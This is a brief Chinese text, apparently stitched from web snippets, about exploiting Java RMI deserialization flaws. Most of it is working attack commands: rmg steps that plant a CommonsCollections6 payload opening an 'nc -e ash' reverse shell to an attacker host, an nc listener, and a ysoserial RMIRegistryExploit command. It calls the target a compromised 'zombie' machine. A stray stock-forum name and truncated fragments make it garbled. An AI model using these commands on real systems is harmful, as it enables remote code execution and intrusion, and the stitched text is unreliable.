第一个执行: java -jar rmg-3.3.0-jar-with-dependencies.jar 肉鸡IP 肉鸡端口 reg AnTrinh 攻击机IP:攻击机端口A --ssl 第二个执行: java -jar rmg-3.3.0-jar-with-dependencies.jar0.0.0.0攻击机端口A listen CommonsCollections6"nc 攻击机IP 攻击机端口B -e ash"--ssl 第三个执行: nc -lvp 攻击...
RMI远程命令执行漏洞是一种安全漏洞,允许攻击者通过远程方式执行命令并访问目标系统。这种漏洞可能导致系统被入侵,数据泄露或其他安全问题。 ,理想股票技术论坛
那如果此时环境中刚好有存在反序列化漏洞的 jar 包,岂不是就直接远程命令执行了? 为了验证,我在工程中加入了 commons-collections-3.1.jar 然后我在同网段的其他电脑上使用 ysoserial 来执行命令:java -cp ysoserial-0.0.4-all.jar ysoserial.exploit.RMIRegistryExploit 8.8.8.8 6600 CommonsCollections1 "calc" 注...